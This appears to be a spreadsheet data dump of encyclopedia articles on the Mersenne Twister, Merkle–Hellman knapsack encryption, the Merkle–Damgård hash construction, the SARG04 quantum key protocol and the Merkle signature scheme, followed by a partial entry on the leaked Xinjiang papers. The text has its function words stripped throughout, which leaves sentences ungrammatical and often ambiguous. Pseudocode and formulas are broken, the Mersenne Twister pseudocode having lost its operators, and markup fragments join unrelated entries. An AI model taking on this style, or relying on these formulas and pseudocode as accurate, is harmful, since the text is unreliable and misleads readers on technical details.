mersenne twister, based {\displaystyle {\textbf {f}}_{2}} -algebra. there number generators pass tests (and numerous generators fail badly). multiple instances differ seed value (but parameters) generally appropriate monte-carlo simulations require independent random number generators, though exists method choosing multiple sets parameter values. poor diffusion: take long time start generating output passes randomness tests, initial state highly non-random—particularly initial state many zeros. consequence instances generator, started initial states almost same, usually output nearly sequence many iterations, eventually diverging. 2002 update algorithm improved initialization, beginning state unlikely. version (mtgp) said even better. contains subsequences 1's. this adds poor diffusion property make recovery many-zero states difficult. cryptographically secure, unless cryptmt variant (discussed below) used. reason observing sufficient number iterations (624 case mt19937, since size state vector future iterations produced) allows predict future iterations. alternatives alternative generator, well ("well equidistributed long-period linear"), offers quicker recovery, equal randomness, nearly equal speed.marsaglia's xorshift generators variants fastest class lfsrs.64-bit melgs ("64-bit maximally equidistributed {\displaystyle {\textbf {f}}_{2}} -linear generators mersenne prime period") completely optimized terms k-distribution properties.the acorn family (published 1989) another k-distributed prng, shows similar computational speed better statistical properties satisfies current (2019) testu01 criteria; used appropriate choices parameters, acorn arbitrarily long period precision. family modern long-period generator, better cache locality, less detectable bias using modern analysis methods. k-distribution pseudorandom sequence {\displaystyle x_{i}} w-bit integers period said k-distributed v-bit accuracy following holds. truncv(x) denote number formed leading bits consider v-bit vectors trunc trunc trunc {\displaystyle (\operatorname {trunc} _{v}(x_{i}),\operatorname {trunc} _{v}(x_{i+1}),\,\ldots ,\operatorname {trunc} _{v}(x_{i+k-1}))\quad (0\leq i&lt;p)} then {\displaystyle 2^{kv}} possible combinations bits occurs number times period, except all-zero combination occurs less often. algorithmic detail w-bit word length, mersenne twister generates integers range {\displaystyle [0,2^{w}-1]} mersenne twister algorithm based matrix linear recurrence finite binary field {\displaystyle {\textbf {f}}_{2}} algorithm twisted generalised feedback shift register (twisted gfsr, tgfsr) rational normal form (tgfsr(r)), state reflection tempering. basic idea define series {\displaystyle x_{i}} simple recurrence relation, output numbers form {\displaystyle x_{i}^{t}} invertible {\displaystyle {\textbf {f}}_{2}} -matrix called tempering matrix. general algorithm characterized following quantities (some explanations make sense reading rest algorithm): word size number bits) degree recurrence middle word, offset used recurrence relation defining series {\displaystyle {\displaystyle 1\leq m&lt;n} separation point word, number bits lower bitmask, {\displaystyle 0\leq r\leq w-1} coefficients rational normal form twist matrix tgfsr(r) tempering bitmasks tgfsr(r) tempering shifts additional mersenne twister tempering shifts/maskswith restriction {\displaystyle 2^{nw-r}-1} mersenne prime. this choice simplifies primitivity test k-distribution test needed parameter search. series {\displaystyle defined series w-bit quantities recurrence relation: {\displaystyle x_{k+n}:=x_{k+m}\oplus \left(({x_{k}}^{u}\mid {x_{k+1}}^{l})a\right)\qquad k=0,1,\ldots {\displaystyle \mid denotes concatenation vectors (with upper bits left), {\displaystyle \oplus bitwise exclusive (xor), {\displaystyle x_{k}^{u}} means upper bits {\displaystyle x_{k}} {\displaystyle x_{k+1}^{l}} means lower bits {\displaystyle x_{k+1}} twist transformation defined rational normal form as:with {\displaystyle i_{w-1}} {\displaystyle (w-1)(w-1)} identity matrix. rational normal form benefit multiplication efficiently expressed (remember matrix multiplication done {\displaystyle {\textbf {f}}_{2}} therefore bitwise takes place addition)where {\displaystyle x_{0}} lowest order {\displaystyle like tgfsr(r), mersenne twister cascaded tempering transform compensate reduced dimensionality equidistribution (because choice rational normal form). note equivalent using matrix {\displaystyle a=t^{-1}*at} invertible matrix, therefore analysis characteristic polynomial mentioned still holds. choose tempering transform easily computable, actually construct itself. tempering defined case mersenne twister {\displaystyle {\begin{aligned}y&amp;\equiv x\oplus ((x\gg u)~\and ~d)\\y&amp;\equiv y\oplus ((y\ll s)~\and ~b)\\y&amp;\equiv y\oplus ((y\ll t)~\and ~c)\\z&amp;\equiv y\oplus (y\gg l)\end{aligned}}} {\displaystyle next value series, {\displaystyle temporary intermediate value, {\displaystyle value returned algorithm, {\displaystyle {\displaystyle bitwise left right shifts, {\displaystyle bitwise and. first last transforms added order improve lower-bit equidistribution. from property tgfsr, {\displaystyle s+t\geq \lfloor {\frac {w}{2}}\rfloor required reach upper bound equidistribution upper bits. coefficients mt19937 are: 9908b0df ffffffff 9d2c5680 efc60000 {\displaystyle {\begin{aligned}(w,n,m,r)&amp;=(32,624,397,31)\\a&amp;={\textrm {9908b0df}}_{16}\\(u,d)&amp;=(11,{\textrm {ffffffff}}_{16})\\(s,b)&amp;=(7,{\textrm {9d2c5680}}_{16})\\(t,c)&amp;=(15,{\textrm {efc60000}}_{16})\\l&amp;=18\\\end{aligned}}} note 32-bit implementations mersenne twister generally ffffffff16. result, occasionally omitted algorithm description, since bitwise case effect. coefficients mt19937-64 are: b5026f5aa96619e9 5555555555555555 71d67fffeda60000 fff7eee000000000 {\displaystyle {\begin{aligned}(w,n,m,r)=(64,312,156,31)\\a={\textrm {b5026f5aa96619e9}}_{16}\\(u,d)=(29,{\textrm {5555555555555555}}_{16})\\(s,b)=(17,{\textrm {71d67fffeda60000}}_{16})\\(t,c)=(37,{\textrm {fff7eee000000000}}_{16})\\l=43\\\end{aligned}}} initialization state needed mersenne twister implementation array values bits each. initialize array, w-bit seed value used supply {\displaystyle x_{0}} {\displaystyle x_{n-1}} setting {\displaystyle x_{0}} seed value thereafter setting {\displaystyle x_{i}=f\times (x_{i-1}\oplus (x_{i-1}\gg (w-2)))+i} {\displaystyle {\displaystyle {\displaystyle n-1} first value algorithm generates based {\displaystyle x_{n}} {\displaystyle x_{0}} constant forms another parameter generator, though part algorithm proper. value mt19937 1812433253. value mt19937-64 6364136223846793005. comparison classical gfsr order achieve {\displaystyle 2^{nw-r}-1} theoretical upper limit period tgfsr, {\displaystyle \phi _{b}(t)} must primitive polynomial, {\displaystyle \phi _{b}(t)} characteristic polynomial {\displaystyle b={\begin{pmatrix}0&amp;i_{w}&amp;\cdots &amp;0&amp;0\\\vdots &amp;&amp;&amp;&amp;\\i_{w}&amp;\vdots &amp;\ddots &amp;\vdots &amp;\vdots \\\vdots &amp;&amp;&amp;&amp;\\0&amp;0&amp;\cdots &amp;i_{w}&amp;0\\0&amp;0&amp;\cdots &amp;0&amp;i_{w-r}\\s&amp;0&amp;\cdots &amp;0&amp;0\end{pmatrix}}{\begin{matrix}\\\\\leftarrow m{\text{-th row}}\\\\\\\\\end{matrix}}} {\displaystyle s={\begin{pmatrix}0&amp;i_{r}\\i_{w-r}&amp;0\end{pmatrix}}a} twist transformation improves classical gfsr following properties: period reaches theoretical upper limit {\displaystyle 2^{nw-r}-1} (except initialized equidistribution dimensions (e.g. linear congruential generators best manage reasonable distribution five dimensions) pseudocode following pseudocode implements general mersenne twister algorithm. constants algorithm description above. assumed represents type sufficient hold values bits: create length array store state generator int[0..n-1] index const lower_mask that binary number const upper_mask lowest bits (not lower_mask) initialize generator seed function seed_mt(int seed) index mt[0] seed loop element mt[i] lowest bits (mt[i-1] (mt[i-1] (w-2))) extract tempered value based mt[index] calling twist() every numbers function extract_number() index index error "generator never seeded" alternatively, seed constant value; 5489 used reference code twist() mt[index] index index return lowest bits generate next values series function twist() (n-1) (mt[i] upper_mask) (mt[(i+1) lower_mask) lowest mt[i] mt[(i index variants cryptmt cryptmt stream cipher cryptographically secure pseudorandom number generator uses mersenne twister internally. developed matsumoto nishimura alongside mariko hagita mutsuo saito. submitted estream project ecrypt network. unlike mersenne twister derivatives, cryptmt patented. mtgp mtgp variant mersenne twister optimised graphics processing units published mutsuo saito makoto matsumoto. basic linear recurrence operations extended parameters chosen allow many threads compute recursion parallel, sharing state space reduce memory load. paper claims improved equidistribution performance (nvidia gtx260 cores) 5×107 random 32-bit integers. sfmt sfmt (simd-oriented fast mersenne twister) variant mersenne twister, introduced 2006, designed fast runs 128-bit simd. roughly twice fast mersenne twister. better equidistribution property v-bit accuracy worse well ("well equidistributed long-period linear"). quicker recovery zero-excess initial state slower well. supports various periods 2607 2216091 1.intel sse2 powerpc altivec supported sfmt. also used games cell playstation tinymt tinymt variant mersenne twister, proposed saito matsumoto 2011. tinymt uses bits state space, significant decrease compared original's state. however, period {\displaystyle 2^{127}-1} shorter original, recommended authors cases memory premium. references further reading harase, (2014), {\displaystyle \mathbb _{2}} -linear relations mersenne twister pseudorandom number generators", mathematics computers simulation, 100: 103–113, arxiv:1301.5435, doi:10.1016/j.matcom.2014.02.002, s2cid 6984431. harase, (2019), "conversion mersenne twister double-precision floating-point numbers", mathematics computers simulation, 161: 76–83, arxiv:1708.06018, doi:10.1016/j.matcom.2018.08.006, s2cid 19777310. external links academic paper related articles makoto matsumoto mersenne twister home page, codes fortran, java, lisp languages mersenne twister examples collection mersenne twister implementations, several programming languages github sfmt action: part generating including sse2 support code project</t>
  </si>
  <si>
    <t>Merkle–Hellman knapsack cryptosystem</t>
  </si>
  <si>
    <t>merkle–hellman knapsack cryptosystem earliest public cryptosystems. published ralph merkle martin hellman 1978. polynomial time attack published shamir 1984. result, cryptosystem considered insecure.: history concept public cryptography introduced whitfield diffie martin hellman 1976. time proposed general concept "trapdoor function", function computationally infeasible calculate without secret "trapdoor" information, found practical example function. several specific public-key cryptosystems proposed researchers next years, 1977 merkle-hellman 1978. description merkle–hellman public cryptosystem, meaning keys used, public encryption private decryption. based subset problem special case knapsack problem). problem follows: given integers {\displaystyle integer {\displaystyle find subset {\displaystyle sums {\displaystyle general, problem known np-complete. however, {\displaystyle superincreasing, meaning element greater numbers lesser problem "easy" solvable polynomial time simple greedy algorithm. merkle–hellman, decrypting message requires solving apparently "hard" knapsack problem. private contains superincreasing list numbers {\displaystyle public contains non-superincreasing list numbers {\displaystyle actually "disguised" version {\displaystyle private also contains "trapdoor" information used transform hard knapsack problem using {\displaystyle easy knapsack problem using {\displaystyle unlike public cryptosystems rsa, keys merkle-hellman interchangeable; private cannot used encryption. thus merkle-hellman directly usable authentication cryptographic signing, although shamir published variant used signing. generation choose block size {\displaystyle integers {\displaystyle bits length encrypted key. choose random superincreasing sequence {\displaystyle positive integers {\displaystyle w=(w_{1},w_{2},\dots ,w_{n})} superincreasing requirement means {\displaystyle w_{k}&gt;\sum _{i=1}^{k-1}w_{i}} {\displaystyle 1&lt;k\leq choose random integer {\displaystyle {\displaystyle q&gt;\sum _{i=1}^{n}w_{i}} choose random integer {\displaystyle {\displaystyle \gcd(r,q)=1} (that {\displaystyle {\displaystyle coprime). calculate sequence {\displaystyle b=(b_{1},b_{2},\dots ,b_{n})} {\displaystyle b_{i}=rw_{i}{\bmod {q}}} .the public {\displaystyle private {\displaystyle (w,q,r)} encryption {\displaystyle {\displaystyle -bit message consisting bits {\displaystyle m_{1}m_{2}\dots m_{n}} {\displaystyle m_{1}} highest order bit. select {\displaystyle b_{i}} {\displaystyle m_{i}} nonzero, together. equivalently, calculate {\displaystyle c=\sum _{i=1}^{n}m_{i}b_{i}} .the ciphertext {\displaystyle decryption decrypt ciphertext {\displaystyle must find subset {\displaystyle sums {\displaystyle transforming problem finding subset {\displaystyle that problem solved polynomial time since {\displaystyle superincreasing. calculate modular inverse {\displaystyle modulo {\displaystyle using extended euclidean algorithm. inverse exist since {\displaystyle coprime {\displaystyle {\displaystyle r':=r^{-1}{\pmod {q}}} computation {\displaystyle independent message, done private generated.2. calculate {\displaystyle c':=cr'{\bmod {q}}} solve subset problem {\displaystyle using superincreasing sequence {\displaystyle simple greedy algorithm described below. {\displaystyle x=(x_{1},x_{2},\dots ,x_{k})} resulting list indexes elements {\displaystyle {\displaystyle (that {\displaystyle c'=\sum _{i=1}^{k}w_{x_{i}}} construct message {\displaystyle {\displaystyle x_{i}} position positions: {\displaystyle m=\sum _{i=1}^{k}2^{n-x_{i}}} solving subset problem this simple greedy algorithm finds subset superincreasing sequence {\displaystyle sums {\displaystyle polynomial time: initialize {\displaystyle empty list.2. find largest element {\displaystyle less equal {\displaystyle {\displaystyle w_{j}} subtract: {\displaystyle c':=c'-w_{j}} append {\displaystyle list {\displaystyle {\displaystyle greater zero, return step example generation create encrypt 8-bit numbers creating random superincreasing sequence values: {\displaystyle w=(2,7,11,21,42,89,180,354)} 706, select larger value {\displaystyle {\displaystyle q=881} .choose {\displaystyle coprime {\displaystyle {\displaystyle r=588} .construct public {\displaystyle multiplying element {\displaystyle {\displaystyle modulo {\displaystyle {\displaystyle {\begin{aligned}&amp;(2*588){\bmod {8}}81=295\\&amp;(7*588){\bmod {8}}81=592\\&amp;(11*588){\bmod {8}}81=301\\&amp;(21*588){\bmod {8}}81=14\\&amp;(42*588){\bmod {8}}81=28\\&amp;(89*588){\bmod {8}}81=353\\&amp;(180*588){\bmod {8}}81=120\\&amp;(354*588){\bmod {8}}81=236\end{aligned}}} hence {\displaystyle b=(295,592,301,14,28,353,120,236)} encryption 8-bit message 01100001 {\displaystyle m=97=01100001_{2}} multiply corresponding number {\displaystyle results: 1129 ciphertext {\displaystyle 1129. decryption decrypt 1129, first extended euclidean algorithm find modular inverse {\displaystyle {\displaystyle {\displaystyle r'=r^{-1}{\bmod {q}}=588^{-1}{\bmod {8}}81=442} .compute 1129 {\displaystyle c'=cr'{\bmod {q}}=1129*442{\bmod {8}}81=372} greedy algorithm decompose {\displaystyle w_{i}} values: {\displaystyle {\begin{aligned}c'&amp;=372\\&amp;w_{8}=354\leq 372\\c'&amp;=372-354=18\\&amp;w_{3}=11\leq 18\\c'&amp;=18-11=7\\&amp;w_{2}=7\leq 7\\c'&amp;=7-7=0\end{aligned}}} thus {\displaystyle 372=354+11+7=w_{8}+w_{3}+w_{2}} list indexes {\displaystyle x=(8,3,2)} message computed {\displaystyle m=\sum _{i=1}^{3}2^{n-x_{i}}=2^{8-8}+2^{8-3}+2^{8-2}=1+32+64=97} cryptanalysis 1984 shamir published attack merkle-hellman cryptosystem decrypt encrypted messages polynomial time without using private key. attack analyzes public {\displaystyle b=(b_{1},b_{2},\dots ,b_{n})} searches pair numbers {\displaystyle {\displaystyle {\displaystyle (ub_{i}{\bmod {m}})} superincreasing sequence. {\displaystyle (u,m)} pair found attack equal {\displaystyle (r',q)} private key, like pair used transform hard knapsack problem using {\displaystyle easy problem using superincreasing sequence. attack operates solely public key; access encrypted messages necessary. references</t>
  </si>
  <si>
    <t>Merkle–Damgård construction</t>
  </si>
  <si>
    <t>cryptography, merkle–damgård construction merkle–damgård hash function method building collision-resistant cryptographic hash functions collision-resistant one-way compression functions.: this construction used design many popular hash algorithms md5, sha-1 sha-2. merkle–damgård construction described ralph merkle's ph.d. thesis 1979. ralph merkle ivan damgård independently proved structure sound: appropriate padding scheme used compression function collision-resistant, hash function also collision-resistant.the merkle–damgård hash function first applies md-compliant padding function create input whose size multiple fixed number (e.g. 1024) compression functions cannot handle inputs arbitrary size. hash function breaks result blocks fixed size, processes time compression function, time combining block input output previous round.: order make construction secure, merkle damgård proposed messages padded padding encodes length original message. this called length padding merkle–damgård strengthening. diagram, one-way compression function denoted transforms fixed length inputs output size inputs. algorithm starts initial value, initialization vector (iv). fixed value (algorithm implementation specific). message block, compression compacting) function takes result far, combines message block, produces intermediate result. last block padded zeros needed bits representing length entire message appended. (see detailed length padding example.) harden hash further, last result sometimes finalisation function. finalisation function several purposes compressing bigger internal state (the last result) smaller output hash size guarantee better mixing avalanche effect bits hash sum. finalisation function often built using compression function. (note documents different terminology used: length padding called "finalisation".) security characteristics popularity construction fact, proven merkle damgård, one-way compression function collision resistant, hash function constructed using unfortunately, construction also several undesirable properties: second preimage attacks long messages always much efficient brute force. multicollisions (many messages hash) found little work collisions. "herding attacks", combines cascaded construction multicollision finding (similar above) collisions found given prefix (chosen-prefix collisions). this allows constructing highly specific colliding documents, done work finding collision, much less would expected random oracle. length extension: given hash {\displaystyle h(x)} unknown input easy find value {\displaystyle h({\mathsf {pad}}(x)\|y)} padding function hash. that possible find hashes inputs related even though remains unknown. length extension attacks actually used attack number commercial message authentication schemes used flickr. wide pipe construction several structural weaknesses merkle–damgård construction, especially length extension problem multicollision attacks, stefan lucks proposed wide-pipe hash instead merkle–damgård construction. wide-pipe hash similar merkle–damgård construction larger internal state size, meaning bit-length internally used larger output bit-length. hash bits desired, compression function takes bits chaining value bits message compresses output bits. therefore, final step second compression function compresses last internal hash value bit) final hash value bit). this done simply discarding half last 2n-bit-output. sha-512/224 sha-512/256 take form since derived variant sha-512. sha-384 sha-224 similarly derived sha-512 sha-256, respectively, width pipe much less fast wide pipe construction demonstrated mridul nandi souradyuti paul widepipe hash function made approximately twice fast widepipe state divided half following manner: half input succeeding compression function half combined output compression function.the main idea hash construction forward half previous chaining value forward output compression function. construction takes longer message blocks every iteration original widepipe. using function before, takes chaining values bits message. however, price extra memory used construction feed-forward. md-compliant padding mentioned introduction, padding scheme used merkle–damgård construction must chosen carefully ensure security scheme. mihir bellare gives sufficient conditions padding scheme possess ensure construction secure: suffices scheme "md-compliant" (the original length-padding scheme used merkle example md-compliant padding).: conditions: {\displaystyle prefix {\displaystyle {\mathsf {pad}}(m).} {\displaystyle |m_{1}|=|m_{2}|} {\displaystyle |{\mathsf {pad}}(m_{1})|=|{\mathsf {pad}}(m_{2})|.} {\displaystyle |m_{1}|\neq |m_{2}|} last block {\displaystyle {\mathsf {pad}}(m_{1})} different last block {\displaystyle {\mathsf {pad}}(m_{2}).} where {\displaystyle |x|} denotes length {\displaystyle with conditions place, find collision hash function exactly find collision underlying compression function. therefore, merkle–damgård construction provably secure underlying compression function secure.: length padding example able feed message compression function, last block needs padded constant data (generally zeroes) full block. example, suppose message hashed "hashinput" octet string, 0x48617368496e707574 ascii) block size compression function bytes bits). blocks (the padding octets shown lightblue background color): 00this implies messages content ending additional zeros result hash value. example, another almost identical message (0x48617368496e7075 7400) generate hash value original message "hashinput" above. words, message extra zeros makes indistinguishable without them. prevent situation, first first padding octet changed (0x80), yielding: 00to make resistant length extension attack, message length added extra block (shown yellow background color): 09however, common implementations fixed bit-size (generally bits modern algorithms) fixed position last block inserting message length value (see sha-1 pseudocode). further improvement made inserting length value last block enough space. doing avoids extra block message length. assume length value encoded bytes bits), message becomes: 09note storing message length out-of-band metadata, otherwise embedded start message effective mitigation length extension attack, long invalidation either message length checksum considered failure integrity checking. references handbook applied cryptography menezes, oorschot vanstone (2001), chapter introduction modern cryptography, jonathan katz yehuda lindell. chapman hall/crc press, august 2007, page (construction 4.13). cryptography made simple nigel smart (2015), chapter</t>
  </si>
  <si>
    <t>SARG04</t>
  </si>
  <si>
    <t>sarg04 quantum cryptography protocol derived first protocol kind, bb84. origin researchers built sarg04 noticed using four states bb84 different information encoding could develop protocol would robust, especially photon-number-splitting attack, attenuated laser pulses used instead single-photon sources. sarg04 defined scarani 2004 physical review letters prepare measure version equivalent bb84 viewed level quantum processing).an entanglement-based version defined well. description sarg04 scheme, alice wishes send private bob. begins strings bits, {\displaystyle {\displaystyle {\displaystyle bits long. encodes strings string {\displaystyle qubits, {\displaystyle |\psi \rangle =\bigotimes _{i=1}^{n}|\psi _{a_{i}b_{i}}\rangle {\displaystyle a_{i}} {\displaystyle b_{i}} {\displaystyle i^{\mathrm {th} bits {\displaystyle {\displaystyle respectively. together, {\displaystyle a_{i}b_{i}} give index following four qubit states: {\displaystyle |\psi _{00}\rangle =|0\rangle {\displaystyle |\psi _{10}\rangle =|1\rangle {\displaystyle |\psi _{01}\rangle =|+\rangle ={\frac {1}{\sqrt {2}}}|0\rangle +{\frac {1}{\sqrt {2}}}|1\rangle {\displaystyle |\psi _{11}\rangle =|-\rangle ={\frac {1}{\sqrt {2}}}|0\rangle -{\frac {1}{\sqrt {2}}}|1\rangle note {\displaystyle b_{i}} decides basis {\displaystyle a_{i}} encoded (either computational basis hadamard basis). qubits states mutually orthogonal, thus impossible distinguish certainty without knowing {\displaystyle alice sends {\displaystyle |\psi \rangle public quantum channel bob. receives state {\displaystyle \varepsilon \rho =\varepsilon |\psi \rangle \langle \psi {\displaystyle \varepsilon represents effects noise channel well eavesdropping third party we'll call eve. after receives string qubits, three parties, namely alice, eve, states. however, since alice knows {\displaystyle makes virtually impossible either distinguish states qubits. proceeds generate string random bits {\displaystyle length {\displaystyle uses bits choice basis measuring qubits transmitted alice. point, announces publicly received alice's transmission. qubit sent, alice chooses computational basis state hadamard basis state state qubit states. alice announces states. alice note whether state computational basis state hadamard basis state; piece information makes secret alice wishes communicate bob. knows state qubit states indicated alice. determine secret bit, must distinguish candidate states. qubit, check whether measurement consistent either possible state. consistent either state, announces invalid, since cannot distinguish state transmitted based measurement. hand, candidate states inconsistent observed measurement, announces valid since deduce state (and therefore secret bit). consider example scenario alice transmits {\displaystyle |\psi _{00}\rangle announces states {\displaystyle |\psi _{00}\rangle {\displaystyle |\psi _{01}\rangle measures computational basis, possible measurement {\displaystyle |\psi _{00}\rangle this outcome clearly consistent state {\displaystyle |\psi _{00}\rangle would also possible outcome state {\displaystyle |\psi _{01}\rangle measures hadamard basis, either {\displaystyle |\psi _{01}\rangle {\displaystyle |\psi _{11}\rangle could measured, probability outcome {\displaystyle |\psi _{01}\rangle state consistent either starting state. hand, outcome {\displaystyle |\psi _{11}\rangle cannot possibly observed qubit state {\displaystyle |\psi _{01}\rangle thus case measures hadamard basis observes state {\displaystyle |\psi _{11}\rangle (and case), deduce state sent therefore secret from remaining {\displaystyle bits bob's measurement conclusive, alice randomly chooses {\displaystyle k/2} bits discloses choices public channel. both alice announce bits publicly check certain number agree. check passes, alice proceed privacy amplification information reconciliation techniques create number shared secret keys. otherwise, cancel start over. advantage scheme relative simpler bb84 protocol alice never announces basis bit. result, needs store copies qubit order able eventually determine state would basis directly announced. intended intended sarg04 situations information originated poissonian source producing weak pulses (this means: mean number photons received imperfect detector, attenuated laser pulses used instead single photons. such sarg04 system reliable distance modus operandi modus operandi sarg04 based principle hardware must remain prior protocols) change must protocol itself.in original "prepare measure" version, sarg04's conjugated bases chosen equal probability.double clicks (when detectors click) important comprehending sarg04: double clicks work differently bb84 sarg04. bb84, item discarded tell alice sent. sarg04, also discarded, "for simplicity", occurrence monitored prevent eavesdropping. paper full quantum analysis various cases. security kiyoshi tamaki hoi-kwong successful proving security two-photon pulses using sarg04.it confirmed sarg04 robust bb84 incoherent attacks.unfortunately incoherent attack identified performs better simple phase-covariant cloning machine, sarg04 found particularly vulnerable single-photon implementations 14.9%. comparison bb84 single-photon implementations, sarg04 theorised equal bb84, experiments shown inferior. references bibliography valerio scarani, antonio acín, grégoire ribordy, nicolas gisin (2004). "quantum cryptography protocols robust photon number splitting attacks weak laser pulse implementations". physical review letters. (5): 057901. arxiv:quant-ph/0211131. bibcode:2004phrvl..92e7901s. doi:10.1103/physrevlett.92.057901. pmid 14995344.{{cite journal}}: maint: uses authors parameter (link) chi-hang fred fung, kiyoshi tamaki, hoi-kwong (2006). "performance quantum-key-distribution protocols". physical review (1): 012337. arxiv:quant-ph/0510025. bibcode:2006phrva..73a2337f. doi:10.1103/physreva.73.012337.{{cite journal}}: maint: uses authors parameter (link) branciard, cyril; gisin, nicolas; kraus, barbara; scarani, valerio (2005). "security quantum cryptography protocols using four qubit states". physical review 32301. arxiv:quant-ph/0505035. bibcode:2005phrva..72c2301b. doi:10.1103/physreva.72.032301.{{cite journal}}: maint: uses authors parameter (link) also quantum cryptography bb84 protocol</t>
  </si>
  <si>
    <t>Merkle signature scheme</t>
  </si>
  <si>
    <t>hash-based cryptography, merkle signature scheme digital signature scheme based hash trees (also called merkle trees) one-time signatures lamport signature scheme. developed ralph merkle late 1970s alternative traditional digital signatures digital signature algorithm rsa. advantage merkle signature scheme believed resistant quantum computer algorithms. traditional public algorithms, elgamal would become insecure case effective quantum computer built (due shor's algorithm). merkle signature scheme however depends existence secure hash functions. this makes merkle signature scheme adjustable resistant quantum computing. note merkle signature time signature finite signing potential; work moni naor moti yung signature based one-way permutations functions (and invention universal one-way hash function) give extend merkle-like signature complete signature scheme. generation merkle signature scheme used sign limited number messages public {\displaystyle {\text{pub}}} number possible messages must power two, denote possible number messages {\displaystyle n=2^{n}} first step generating public {\displaystyle {\text{pub}}} generate {\displaystyle private/public pairs {\displaystyle (x_{i},y_{i})} one-time signature scheme (such lamport signature scheme). {\displaystyle 1\leq i\leq 2^{n}} hash value public {\displaystyle h_{i}=h(y_{i})} computed. with hash values {\displaystyle h_{i}} hash tree built, placing {\displaystyle 2^{n}} hash values leaves recursively hashing form binary tree. {\displaystyle a_{i,j}} denote node tree height {\displaystyle left-right position {\displaystyle then, hash values {\displaystyle h_{i}=a_{0,i}} leaves. value inner node tree hash concatenation children. example, {\displaystyle a_{1,0}=h(a_{0,0}||a_{0,1})} {\displaystyle a_{2,0}=h(a_{1,0}||a_{1,1})} way, tree {\displaystyle 2^{n}} leaves {\displaystyle 2^{n+1}-1} nodes built. private merkle signature scheme entire {\displaystyle (x_{i},y_{i})} pairs. major problems scheme size private scales linearly number messages sent. public {\displaystyle {\text{pub}}} root tree, {\displaystyle a_{n,0}} individual public keys {\displaystyle y_{i}} made public without breaking security. however, needed public key, practical keep secret minimize size. signature generation sign message {\displaystyle merkle signature scheme, signer picks pair {\displaystyle (x_{i},y_{i})} signs using one-time signature scheme, adds additional information prove indeed original pairs (rather newly generated forger). first, signer chooses {\displaystyle (x_{i},y_{i})} pair previously used sign message, uses one-time signature scheme sign message, resulting signature {\displaystyle {\text{sig}}'} corresponding public {\displaystyle y_{i}} prove message verifier {\displaystyle (x_{i},y_{i})} fact original pairs, signer simply includes intermediate nodes merkle tree verifier verify {\displaystyle h_{i}=a_{0,i}} used compute public {\displaystyle a_{n,0}} root tree. path hash tree {\displaystyle a_{0,i}} root {\displaystyle n+1} nodes, call {\displaystyle a_{0},\ldots ,a_{n}} {\displaystyle a_{0}=a_{0,i}=h(y_{i})} leaf {\displaystyle a_{n}=a_{n,0}={\text{pub}}} root. know {\displaystyle a_{i}} child {\displaystyle a_{i+1}} verifier calculate next node {\displaystyle a_{i+1}} given previous, need know child {\displaystyle a_{i+1}} sibling node {\displaystyle a_{i}} call node auth {\displaystyle {\text{auth}}_{i}} auth {\displaystyle a_{i+1}=h(a_{i}||{\text{auth}}_{i})} hence, {\displaystyle nodes auth auth {\displaystyle {\text{auth}}_{0},\ldots ,{\text{auth}}_{n-1}} needed, reconstruct {\displaystyle a_{n}=a_{n,0}={\text{pub}}} {\displaystyle a_{0}=a_{0,i}} example authentication path illustrated figure right. these nodes auth auth {\displaystyle {\text{auth}}_{0},\ldots ,{\text{auth}}_{n-1}} {\displaystyle y_{i}} one-time signature {\displaystyle {\text{sig}}'} together constitute signature {\displaystyle using merkle signature scheme: auth auth auth {\displaystyle {\text{sig}}=({\text{sig}}'||y_{i}||{\text{auth}}_{0}||{\text{auth}}_{1}||\ldots ||{\text{auth}}_{n-1})} note using lamport signature scheme signing, {\displaystyle {\text{sig}}'} contains part private {\displaystyle x_{i}} signature verification receiver knows public {\displaystyle {\text{pub}}} message {\displaystyle signature auth auth auth {\displaystyle {\text{sig}}=({\text{sig}}'||y_{i}||{\text{auth}}_{0}||{\text{auth}}_{1}||\ldots ||{\text{auth}}_{n-1})} first, receiver verifies one-time signature {\displaystyle {\text{sig}}'} message {\displaystyle using one-time signature public {\displaystyle y_{i}} {\displaystyle {\text{sig}}'} valid signature {\displaystyle receiver computes {\displaystyle a_{0}=h(y_{i})} hashing public one-time signature. {\displaystyle j=1,\ldots ,n-1} nodes {\displaystyle a_{j}} path computed auth {\displaystyle a_{j}=h(a_{j-1}||{\text{auth}}_{j-1})} {\displaystyle a_{n}} equals public {\displaystyle {\text{pub}}} merkle signature scheme, signature valid. references dahmen, dring, klintsevich, buchmann, l.c. coronado garca. "cmss improved merkle signature scheme". progress cryptology indocrypt 2006, 2006. klintsevich, okeya, c.vuillaume, buchmann, e.dahmen. "merkle signatures virtually unlimited signature capacity". international conference applied cryptography network security acns07, 2007. ralph merkle. "secrecy, authentication public systems certified digital signature". ph.d. dissertation, dept. electrical engineering, stanford university, 1979. moni naor, moti yung: universal one-way hash functions cryptographic applications .stoc 1989: 33-43 micali, jakobsson, leighton, szydlo. "fractal merkle tree representation traversal". rsa-ct 2003 external links efficient merkle trees labs explanation original purpose merkle trees lamport signatures, efficient one-time signature scheme. introduction hash-based signatures merkle signatures adam langley. parts series hash-based signatures david wong.</t>
  </si>
  <si>
    <t>Xinjiang papers</t>
  </si>
  <si>
    <t>xinjiang papers collection pages internal chinese government documents describing government policy regarding uyghur muslims xinjiang region. november 2019, journalists austin ramzy chris buckley york times broke story characterized documents "one significant leaks government papers inside china's ruling communist party decades." according york times, documents leaked source inside chinese communist party include breakdown china created organized xinjiang internment camps.in response xinjiang papers' publication, chinese government claimed documents "sheer, pure fabrication". leak increased scrutiny criticism china's internment camps xinjiang. description contents xinjiang papers collection pages leaked internal chinese documents detailing detention uyghur muslims xinjiang chinese communist party. they consist internal speeches general secretary jinping officials, reports population control surveillance uyghur muslims xinjiang, internal investigations local officials. internal speeches officials series internal speeches 2014, called "struggle terrorism, infiltration separatism" xinjiang. responding terror attacks xinjiang, called chinese government harsh them" "show absolutely mercy." compared islamic extremism "virus-like contagion" "dangerously addictive drug", would require period painful, interventionary treatment." mentioned internment camps must implement "effective educational remolding transformation criminals", "education transformation" must continue people released.xi warned unrest syria afghanistan would allow terrorist organizations infiltrate central asia launch terrorist attacks xinjiang. stated violence spread parts china, "social stability suffer shocks, general unity people every ethnicity damaged, broad outlook reform, development stability affected." campaign xinjiang, encouraged officials emulate america's "war terror" following september attacks. according york times, xi's speeches show views threats party lens collapse soviet union, attributed "ideological laxity spineless leadership."the xinjiang papers also contain internal speeches officials. hailun, xinjiang's former security official, cited terrorist attacks united kingdom "warning lesson" china adequately control propagation extremism. claimed uk's terrorist attacks could attributed british government's "excessive emphasis human rights security." chen quanguo, party secretary xinjiang, said struggling terror safeguarding stability "protracted war" "war offense." reports population control surveillance documents contain directives reports surveillance control uyghur muslims xinjiang. according leaked papers, 